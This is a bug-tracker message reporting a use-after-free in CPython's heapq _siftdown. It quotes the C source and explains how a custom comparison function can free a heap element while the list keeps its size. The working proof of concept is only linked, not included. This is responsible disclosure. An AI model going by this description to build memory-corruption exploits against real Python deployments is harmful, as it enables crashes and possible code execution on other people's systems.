[issue24099] Use after free in siftdown (1)
paul
report at bugs.python.org
Fri May 1 16:11:20 CEST 2015
New submission from paul:
# _siftdown(PyListObject *heap, Py_ssize_t startpos, Py_ssize_t pos)
# ...
# newitem = PyList_GET_ITEM(heap, pos);
# Py_INCREF(newitem);
# /* Follow the path to the root, moving parents down until finding
# a place newitem fits. */
# while (pos > startpos){
# parentpos = (pos - 1) >> 1;
# 1 parent = PyList_GET_ITEM(heap, parentpos);
# 2 cmp = PyObject_RichCompareBool(newitem, parent, Py_LT);
# if (cmp == -1) {
# Py_DECREF(newitem);
# return -1;
# }
# 3 if (size != PyList_GET_SIZE(heap)) {
# Py_DECREF(newitem);
# PyErr_SetString(PyExc_RuntimeError,
# "list changed size during iteration");
# return -1;
# }
# if (cmp == 0)
# break;
# 4 Py_INCREF(parent);
# ...
#
# 1. parent isn't protected (refcnt==1)
# 2. custom compare function deletes all objects in "heap" and repopulates it with
# fresh instances. "parent" is freed
# 3. check is ineffective. Heap was mutated while preserving its size
# 4. use after free. Crash will manifest itself later.
----------
files: poc_siftdown1.py
messages: 242316
nosy: pkt
priority: normal
severity: normal
status: open
title: Use after free in siftdown (1)
type: crash
versions: Python 3.4
Added file: http://bugs.python.org/file39250/poc_siftdown1.py
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue24099>
_______________________________________
More information about the Python-bugs-list
mailing list